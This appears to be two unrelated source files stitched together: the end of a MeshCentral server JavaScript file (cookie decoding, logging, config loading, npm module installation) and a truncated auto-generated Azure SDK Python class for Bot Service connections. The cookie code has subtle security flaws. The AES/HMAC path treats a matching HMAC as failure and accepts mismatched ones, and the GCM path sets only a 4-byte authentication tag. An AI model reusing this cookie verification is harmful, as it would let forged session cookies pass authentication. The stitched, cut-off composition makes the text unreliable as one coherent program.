// Decode a cookie back into an object using a key using AES256-GCM or AES128-CBC/HMAC-SHA386. Return null if it's not a valid cookie. (key must be 32 bytes or more)
obj.decodeCookie = function (cookie, key, timeout) {
var r = obj.decodeCookieAESGCM(cookie, key, timeout);
if (r == null) { r = obj.decodeCookieAESSHA(cookie, key, timeout); }
if ((r == null) && (obj.args.cookieencoding == null) && ((cookie == cookie.toLowerCase()) || (cookie == cookie.toUpperCase()))) {
obj.debug('cookie', 'Upper/Lowercase cookie, try "CookieEncoding":"hex" in settings section of config.json.');
console.log('Upper/Lowercase cookie, try "CookieEncoding":"hex" in settings section of config.json.');
}
if ((r != null) && (typeof r.once == 'string') && (r.once.length > 0)) {
// This cookie must only be used once.
if (timeout == null) { timeout = 2; }
if (obj.cookieUseOnceTable[r.once] == null) {
const ctimeout = (((r.expire) == null || (typeof r.expire != 'number')) ? (r.time + ((timeout + 3) * 60000)) : (r.time + ((r.expire + 3) * 60000)));
// Store the used cookie in RAM
obj.cookieUseOnceTable[r.once] = ctimeout;
// Store the used cookie in the database
// TODO
// Send the used cookie to peer servers
// TODO
// Clean up the used table
if (++obj.cookieUseOnceTableCleanCounter > 20) {
const now = Date.now();
for (var i in obj.cookieUseOnceTable) { if (obj.cookieUseOnceTable[i] < now) { delete obj.cookieUseOnceTable[i]; } }
obj.cookieUseOnceTableCleanCounter = 0;
}
} else { return null; }
}
return r;
}
// Decode a cookie back into an object using a key using AES256-GCM. Return null if it's not a valid cookie. (key must be 32 bytes or more)
obj.decodeCookieAESGCM = function (cookie, key, timeout) {
try {
if (key == null) { key = obj.serverKey; }
cookie = Buffer.from(cookie.replace(/\@/g, '+').replace(/\$/g, '/'), obj.args.cookieencoding ? obj.args.cookieencoding : 'base64');
const decipher = obj.crypto.createDecipheriv('aes-256-gcm', key.slice(0, 32), cookie.slice(0, 12));
decipher.setAuthTag(cookie.slice(12, 16));
const o = JSON.parse(decipher.update(cookie.slice(28), 'binary', 'utf8') + decipher.final('utf8'));
if ((o.time == null) || (o.time == null) || (typeof o.time != 'number')) { obj.debug('cookie', 'ERR: Bad cookie due to invalid time'); return null; }
o.time = o.time * 1000; // Decode the cookie creation time
o.dtime = Date.now() - o.time; // Decode how long ago the cookie was created (in milliseconds)
if ((o.expire) == null || (typeof o.expire != 'number')) {
// Use a fixed cookie expire time
if (timeout == null) { timeout = 2; }
if ((o.dtime > (timeout * 60000)) || (o.dtime < -30000)) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; } // The cookie is only valid 120 seconds, or 30 seconds back in time (in case other server's clock is not quite right)
} else {
// An expire time is included in the cookie (in minutes), use this.
if ((o.expire !== 0) && ((o.dtime > (o.expire * 60000)) || (o.dtime < -30000))) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; } // The cookie is only valid 120 seconds, or 30 seconds back in time (in case other server's clock is not quite right)
}
obj.debug('cookie', 'Decoded AESGCM cookie: ' + JSON.stringify(o));
return o;
} catch (ex) { obj.debug('cookie', 'ERR: Bad AESGCM cookie due to exception: ' + ex); return null; }
};
// Decode a cookie back into an object using a key using AES256 / HMAC-SHA386. Return null if it's not a valid cookie. (key must be 80 bytes or more)
// We do this because poor .NET does not support AES256-GCM.
obj.decodeCookieAESSHA = function (cookie, key, timeout) {
try {
if (key == null) { key = obj.serverKey; }
if (key.length < 80) { return null; }
cookie = Buffer.from(cookie.replace(/\@/g, '+').replace(/\$/g, '/'), obj.args.cookieencoding ? obj.args.cookieencoding : 'base64');
const decipher = obj.crypto.createDecipheriv('aes-256-cbc', key.slice(48, 80), cookie.slice(0, 16));
const rawmsg = decipher.update(cookie.slice(16), 'binary', 'binary') + decipher.final('binary');
const hmac = obj.crypto.createHmac('sha384', key.slice(0, 48));
hmac.update(rawmsg.slice(48));
if (Buffer.compare(hmac.digest(), Buffer.from(rawmsg.slice(0, 48))) == false) { return null; }
const o = JSON.parse(rawmsg.slice(48).toString('utf8'));
if ((o.time == null) || (o.time == null) || (typeof o.time != 'number')) { obj.debug('cookie', 'ERR: Bad cookie due to invalid time'); return null; }
o.time = o.time * 1000; // Decode the cookie creation time
o.dtime = Date.now() - o.time; // Decode how long ago the cookie was created (in milliseconds)
if ((o.expire) == null || (typeof o.expire != 'number')) {
// Use a fixed cookie expire time
if (timeout == null) { timeout = 2; }
if ((o.dtime > (timeout * 60000)) || (o.dtime < -30000)) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; } // The cookie is only valid 120 seconds, or 30 seconds back in time (in case other server's clock is not quite right)
} else {
// An expire time is included in the cookie (in minutes), use this.
if ((o.expire !== 0) && ((o.dtime > (o.expire * 60000)) || (o.dtime < -30000))) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; } // The cookie is only valid 120 seconds, or 30 seconds back in time (in case other server's clock is not quite right)
}
obj.debug('cookie', 'Decoded AESSHA cookie: ' + JSON.stringify(o));
return o;
} catch (ex) { obj.debug('cookie', 'ERR: Bad AESSHA cookie due to exception: ' + ex); return null; }
};
// Debug
obj.debug = function (source, ...args) {
// Send event to console
if ((obj.debugSources != null) && ((obj.debugSources == '*') || (obj.debugSources.indexOf(source) >= 0))) { console.log(source.toUpperCase() + ':', ...args); }
// Send event to log file
if (obj.config.settings && obj.config.settings.log) {
if (typeof obj.args.log == 'string') { obj.args.log = obj.args.log.split(','); }
if (obj.args.log.indexOf(source) >= 0) {
const d = new Date();
if (obj.xxLogFile == null) {
try {
obj.xxLogFile = obj.fs.openSync(obj.getConfigFilePath('log.txt'), 'a+', 666);
obj.fs.writeSync(obj.xxLogFile, '---- Log start at ' + new Date().toLocaleString() + ' ----\r\n');
obj.xxLogDateStr = d.toLocaleDateString();
} catch (ex) { }
}
if (obj.xxLogFile != null) {
try {
if (obj.xxLogDateStr != d.toLocaleDateString()) { obj.xxLogDateStr = d.toLocaleDateString(); obj.fs.writeSync(obj.xxLogFile, '---- ' + d.toLocaleDateString() + ' ----\r\n'); }
obj.fs.writeSync(obj.xxLogFile, new Date().toLocaleTimeString() + ' - ' + source + ': ' + Array.prototype.slice.call(...args).join('') + '\r\n');
} catch (ex) { }
}
}
}
// Send the event to logged in administrators
if ((obj.debugRemoteSources != null) && ((obj.debugRemoteSources == '*') || (obj.debugRemoteSources.indexOf(source) >= 0))) {
var sendcount = 0;
for (var sessionid in obj.webserver.wssessions2) {
var ws = obj.webserver.wssessions2[sessionid];
if ((ws != null) && (ws.userid != null)) {
var user = obj.webserver.users[ws.userid];
if ((user != null) && (user.siteadmin == 4294967295)) {
try { ws.send(JSON.stringify({ action: 'trace', source: source, args: args, time: Date.now() })); sendcount++; } catch (ex) { }
}
}
}
if (sendcount == 0) { obj.debugRemoteSources = null; } // If there are no listeners, remove debug sources.
}
};
// Update server state. Writes a server state file.
var meshServerState = {};
obj.updateServerState = function (name, val) {
//console.log('updateServerState', name, val);
try {
if ((name != null) && (val != null)) {
var changed = false;
if ((name != null) && (meshServerState[name] != val)) { if ((val == null) && (meshServerState[name] != null)) { delete meshServerState[name]; changed = true; } else { if (meshServerState[name] != val) { meshServerState[name] = val; changed = true; } } }
if (changed == false) return;
}
var r = 'time=' + Date.now() + '\r\n';
for (var i in meshServerState) { r += (i + '=' + meshServerState[i] + '\r\n'); }
try {
obj.fs.writeFileSync(obj.getConfigFilePath('serverstate.txt'), r); // Try to write the server state, this may fail if we don't have permission.
} catch (ex) { obj.serverSelfWriteAllowed = false; }
} catch (ex) { } // Do nothing since this is not a critical feature.
};
// Logging funtions
function logException(e) { e += ''; logErrorEvent(e); }
function logInfoEvent(msg) { if (obj.servicelog != null) { obj.servicelog.info(msg); } console.log(msg); }
function logWarnEvent(msg) { if (obj.servicelog != null) { obj.servicelog.warn(msg); } console.log(msg); }
function logErrorEvent(msg) { if (obj.servicelog != null) { obj.servicelog.error(msg); } console.error(msg); }
obj.getServerWarnings = function () { return serverWarnings; }
obj.addServerWarning = function(msg, print) { serverWarnings.push(msg); if (print !== false) { console.log("WARNING: " + msg); } }
// auth.log functions
obj.authLog = function (server, msg) {
if (typeof msg != 'string') return;
if (obj.syslogauth != null) { try { obj.syslogauth.log(obj.syslogauth.LOG_INFO, msg); } catch (ex) { } }
if (obj.authlogfile != null) { // Write authlog to file
try {
var d = new Date(), month = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'][d.getMonth()];
var msg = month + ' ' + d.getDate() + ' ' + obj.common.zeroPad(d.getHours(), 2) + ':' + obj.common.zeroPad(d.getMinutes(), 2) + ':' + d.getSeconds() + ' meshcentral ' + server + '[' + process.pid + ']: ' + msg + ((obj.platform == 'win32') ? '\r\n' : '\n');
obj.fs.write(obj.authlogfile, msg, function (err, written, string) { });
} catch (ex) { }
}
}
// Return the path of a file into the meshcentral-data path
obj.getConfigFilePath = function (filename) {
if ((obj.config != null) && (obj.config.configfiles != null) && (obj.config.configfiles[filename] != null) && (typeof obj.config.configfiles[filename] == 'string')) {
//console.log('getConfigFilePath(\"' + filename + '\") = ' + obj.config.configfiles[filename]);
return obj.config.configfiles[filename];
}
//console.log('getConfigFilePath(\"' + filename + '\") = ' + obj.path.join(obj.datapath, filename));
return obj.path.join(obj.datapath, filename);
};
return obj;
}
// Resolve a list of names, call back with list of failed resolves.
function checkResolveAll(names, func) {
var dns = require('dns'), state = { func: func, count: names.length, err: null };
for (var i in names) {
dns.resolve(names[i], function (err, records) {
if (err != null) { if (this.state.err == null) { this.state.err = [this.name]; } else { this.state.err.push(this.name); } }
if (--this.state.count == 0) { this.state.func(this.state.err); }
}.bind({ name: names[i], state: state }))
}
}
// Return the server configuration
function getConfig(createSampleConfig) {
// Figure out the datapath location
var i, fs = require('fs'), path = require('path'), datapath = null;
var args = require('minimist')(process.argv.slice(2));
if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) {
datapath = path.join(__dirname, '../../meshcentral-data');
} else {
datapath = path.join(__dirname, '../meshcentral-data');
}
if (args.datapath) { datapath = args.datapath; }
try { fs.mkdirSync(datapath); } catch (e) { }
// Read configuration file if present and change arguments.
var config = {}, configFilePath = path.join(datapath, 'config.json');
if (fs.existsSync(configFilePath)) {
// Load and validate the configuration file
try { config = require(configFilePath); } catch (e) { console.log('ERROR: Unable to parse ' + configFilePath + '.'); return null; }
if (config.domains == null) { config.domains = {}; }
for (i in config.domains) { if ((i.split('/').length > 1) || (i.split(' ').length > 1)) { console.log("ERROR: Error in config.json, domain names can't have spaces or /."); return null; } }
} else {
if (createSampleConfig === true) {
// Copy the "sample-config.json" to give users a starting point
var sampleConfigPath = path.join(__dirname, 'sample-config.json');
if (fs.existsSync(sampleConfigPath)) { fs.createReadStream(sampleConfigPath).pipe(fs.createWriteStream(configFilePath)); }
}
}
// Set the command line arguments to the config file if they are not present
if (!config.settings) { config.settings = {}; }
for (i in args) { config.settings[i] = args[i]; }
// Lower case all keys in the config file
try {
require('./common.js').objKeysToLower(config, ['ldapoptions', 'defaultuserwebstate', 'forceduserwebstate']);
} catch (ex) {
console.log('CRITICAL ERROR: Unable to access the file \"./common.js\".\r\nCheck folder & file permissions.');
process.exit();
}
return config;
}
// Check if a list of modules are present and install any missing ones
function InstallModules(modules, func) {
var missingModules = [];
if (modules.length > 0) {
var dependencies = require('./package.json').dependencies;
for (var i in modules) {
// Modules may contain a version tag (foobar@1.0.0), remove it so the module can be found using require
var moduleNameAndVersion = modules[i];
var moduleInfo = moduleNameAndVersion.split('@', 2);
var moduleName = moduleInfo[0];
var moduleVersion = moduleInfo[1];
try {
// Does the module need a specific version?
if (moduleVersion) {
if (require(`${moduleName}/package.json`).version != moduleVersion) { throw new Error(); }
} else {
// For all other modules, do the check here.
// Is the module in package.json? Install exact version.
if (typeof dependencies[moduleName] != undefined) { moduleVersion = dependencies[moduleName]; }
require(moduleName);
}
} catch (e) {
if (previouslyInstalledModules[modules[i]] !== true) { missingModules.push(moduleNameAndVersion); }
}
}
if (missingModules.length > 0) { InstallModule(missingModules.shift(), InstallModules, modules, func); } else { func(); }
}
}
// Check if a module is present and install it if missing
function InstallModule(modulename, func, tag1, tag2) {
console.log('Installing ' + modulename + '...');
var child_process = require('child_process');
var parentpath = __dirname;
// Get the working directory
if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) { parentpath = require('path').join(__dirname, '../..'); }
child_process.exec(npmpath + ` install --no-optional ${modulename}`, { maxBuffer: 512000, timeout: 120000, cwd: parentpath }, function (error, stdout, stderr) {
if ((error != null) && (error != '')) {
console.log('ERROR: Unable to install required module "' + modulename + '". MeshCentral may not have access to npm, or npm may not have suffisent rights to load the new module. Try "npm install ' + modulename + '" to manualy install this module.\r\n');
process.exit();
return;
}
previouslyInstalledModules[modulename] = true;
func(tag1, tag2);
return;
});
}
// Detect CTRL-C on Linux and stop nicely
process.on('SIGINT', function () { if (meshserver != null) { meshserver.Stop(); meshserver = null; } console.log('Server Ctrl-C exit...'); process.exit(); });
// Add a server warning, warnings will be shown to the administrator on the web application
var serverWarnings = [];
function addServerWarning(msg, print) { serverWarnings.push(msg); if (print !== false) { console.log("WARNING: " + msg); } }
// Load the really basic modules
var npmpath = 'npm';
var meshserver = null;
var childProcess = null;
var previouslyInstalledModules = {};
function mainStart() {
// Check the NodeJS is version 6 or better.
if (Number(process.version.match(/^v(\d+\.\d+)/)[1]) < 6) { console.log("MeshCentral requires Node v6 or above, current version is " + process.version + "."); return; }
// If running within the node_modules folder, move working directory to the parent of the node_modules folder.
if (__dirname.endsWith('\\node_modules\\meshcentral') || __dirname.endsWith('/node_modules/meshcentral')) { process.chdir(require('path').join(__dirname, '..', '..')); }
// Check for any missing modules.
InstallModules(['minimist'], function () {
// Parse inbound arguments
var args = require('minimist')(process.argv.slice(2));
// Setup the NPM path
if (args.npmpath == null) {
try {
var xnodepath = process.argv[0];
var xnpmpath = require('path').join(require('path').dirname(process.argv[0]), 'npm');
if (require('fs').existsSync(xnodepath) && require('fs').existsSync(xnpmpath)) {
if (xnodepath.indexOf(' ') >= 0) { xnodepath = '"' + xnodepath + '"'; }
if (xnpmpath.indexOf(' ') >= 0) { xnpmpath = '"' + xnpmpath + '"'; }
if (require('os').platform() == 'win32') { npmpath = xnpmpath; } else { npmpath = (xnodepath + ' ' + xnpmpath); }
}
} catch (ex) { console.log(ex); }
} else {
npmpath = args.npmpath;
}
// Get the server configuration
var config = getConfig(false);
if (config == null) { process.exit(); }
// Lowercase the auth value if present
for (var i in config.domains) { if (typeof config.domains[i].auth == 'string') { config.domains[i].auth = config.domains[i].auth.toLowerCase(); } }
// Check if Windows SSPI and YubiKey OTP will be used
var sspi = false;
var ldap = false;
var allsspi = true;
var yubikey = false;
var recordingIndex = false;
var domainCount = 0;
if (require('os').platform() == 'win32') { for (var i in config.domains) { domainCount++; if (config.domains[i].auth == 'sspi') { sspi = true; } else { allsspi = false; } } } else { allsspi = false; }
if (domainCount == 0) { allsspi = false; }
for (var i in config.domains) {
if (config.domains[i].yubikey != null) { yubikey = true; }
if (config.domains[i].auth == 'ldap') { ldap = true; }
if ((config.domains[i].sessionrecording != null) && (config.domains[i].sessionrecording.index == true)) { recordingIndex = true; }
}
// Get the current node version
var nodeVersion = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
// Build the list of required modules
var modules = ['ws', 'cbor', 'nedb', 'https', 'yauzl', 'xmldom', 'ipcheck', 'express', 'archiver', 'multiparty', 'node-forge', 'express-ws', 'compression', 'body-parser', 'connect-redis', 'cookie-session', 'express-handlebars'];
if (require('os').platform() == 'win32') { modules.push('node-windows'); if (sspi == true) { modules.push('node-sspi'); } } // Add Windows modules
if (ldap == true) { modules.push('ldapauth-fork'); }
if (recordingIndex == true) { modules.push('image-size'); } // Need to get the remote desktop JPEG sizes to index the recodring file.
if (config.letsencrypt != null) { if (nodeVersion < 8) { addServerWarning("Let's Encrypt support requires Node v8.x or higher.", !args.launch); } else { modules.push('acme-client'); } } // Add acme-client module
if (config.settings.mqtt != null) { modules.push('aedes'); } // Add MQTT Modules
if (config.settings.mysql != null) { modules.push('mysql'); } // Add MySQL, official driver.
if (config.settings.mongodb != null) { modules.push('mongodb'); } // Add MongoDB, official driver.
if (config.settings.mariadb != null) { modules.push('mariadb'); } // Add MariaDB, official driver.
if (config.settings.vault != null) { modules.push('node-vault'); } // Add official HashiCorp's Vault module.
if (config.settings.plugins != null) { modules.push('semver'); } // Required for version compat testing and update checks
if ((config.settings.plugins != null) && (config.settings.plugins.proxy != null)) { modules.push('https-proxy-agent'); } // Required for HTTP/HTTPS proxy support
else if (config.settings.xmongodb != null) { modules.push('mongojs'); } // Add MongoJS, old driver.
if (config.smtp != null) { modules.push('nodemailer'); } // Add SMTP support
if (args.translate) { modules.push('jsdom'); modules.push('esprima'); modules.push('minify-js'); modules.push('html-minifier'); } // Translation support
// If running NodeJS < 8, install "util.promisify"
if (nodeVersion < 8) { modules.push('util.promisify'); }
// Setup encrypted zip support if needed
if (config.settings.autobackup && config.settings.autobackup.zippassword) { modules.push('archiver-zip-encrypted'); }
// Setup 2nd factor authentication
if (config.settings.no2factorauth !== true) {
// Setup YubiKey OTP if configured
if (yubikey == true) { modules.push('yubikeyotp'); } // Add YubiKey OTP support
if (allsspi == false) { modules.push('otplib@10.2.3'); } // Google Authenticator support (v10 supports older NodeJS versions).
}
// Syslog support
if ((require('os').platform() != 'win32') && (config.settings.syslog || config.settings.syslogjson)) { modules.push('modern-syslog'); }
// Setup heapdump support if needed, useful for memory leak debugging
// https://www.arbazsiddiqui.me/a-practical-guide-to-memory-leaks-in-nodejs/
if (config.settings.heapdump === true) { modules.push('heapdump'); }
// Install any missing modules and launch the server
InstallModules(modules, function () { meshserver = CreateMeshCentralServer(config, args); meshserver.Start(); });
// On exit, also terminate the child process if applicable
process.on('exit', function () { if (childProcess) { childProcess.kill(); childProcess = null; } });
// If our parent exits, we also exit
if (args.launch) {
process.stderr.on('end', function () { process.exit(); });
process.stdout.on('end', function () { process.exit(); });
process.stdin.on('end', function () { process.exit(); });
process.stdin.on('data', function (data) { });
}
});
}
if (require.main === module) {
mainStart(); // Called directly, launch normally.
} else {
module.exports.mainStart = mainStart; // Required as a module, useful for winservice.js
}
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class BotConnectionOperations(object):
"""BotConnectionOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.botservice.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_service_providers(
self,
**kwargs # type: Any
):
# type: (...) -> "_models.ServiceProviderResponseList"
"""Lists the available Service Providers for creating Connection Settings.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ServiceProviderResponseList, or the result of cls(response)
:rtype: ~azure.mgmt.botservice.models.ServiceProviderResponseList
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceProviderResponseList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-02"
accept = "application/json"
# Construct URL
url = self.list_service_providers.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ServiceProviderResponseList', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_service_providers.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.BotService/listAuthServiceProviders'} # type: ignore
def list_with_secrets(
self,
resource_group_name, # type: str
resource_name, # type: str
connection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ConnectionSetting"
"""Get a Connection Setting registration for a Bot Service.
:param resource_group_name: The name of the Bot resource group in the user subscription.
:type resource_group_name: str
:param resource_name: The name of the Bot resource.
:type resource_name: str
:param connection_name: The name of the Bot Service Connection Setting resource.
:type connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ConnectionSetting, or the result of cls(response)
:rtype: ~azure.mgmt.botservice.models.ConnectionSetting
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionSetting"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-02"
accept = "application/json"
# Construct URL
url = self.list_with_secrets.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ConnectionSetting', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_with_secrets.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}/listWithSecrets'} # type: ignore
def create(
self,
resource_group_name, # type: str
resource_name, # type: str
connection_name, # type: str
parameters, # type: "_models.ConnectionSetting"
**kwargs # type: Any
):
# type: (...) -> "_models.ConnectionSetting"
"""Register a new Auth Connection for a Bot Service.
:param resource_group_name: The name of the Bot resource group in the user subscription.
:type resource_group_name: str
:param resource_name: The name of the Bot resource.
:type resource_name: str
:param connection_name: The name of the Bot Service Connection Setting resource.
:type connection_name: str
:param parameters: The parameters to provide for creating the Connection Setting.
:type parameters: ~azure.mgmt.botservice.models.ConnectionSetting
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ConnectionSetting, or the result of cls(response)
:rtype: ~azure.mgmt.botservice.models.ConnectionSetting
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionSetting"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-02"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ConnectionSetting')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ConnectionSetting', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ConnectionSetting', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'} # type: ignore
def update(
self,
resource_group_name, # type: str
resource_name, # type: str
connection_name, # type: str
parameters, # type: "_models.ConnectionSetting"
**kwargs # type: Any
):
# type: (...) -> "_models.ConnectionSetting"
"""Updates a Connection Setting registration for a Bot Service.
:param resource_group_name: The name of the Bot resource group in the user subscription.
:type resource_group_name: str
:param resource_name: The name of the Bot resource.
:type resource_name: str
:param connection_name: The name of the Bot Service Connection Setting resource.
:type connection_name: str
:param parameters: The parameters to provide for updating the Connection Setting.
:type parameters: ~azure.mgmt.botservice.models.ConnectionSetting
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ConnectionSetting, or the result of cls(response)
:rtype: ~azure.mgmt.botservice.models.ConnectionSetting
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionSetting"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-02"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ConnectionSetting')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ConnectionSetting', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ConnectionSetting', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
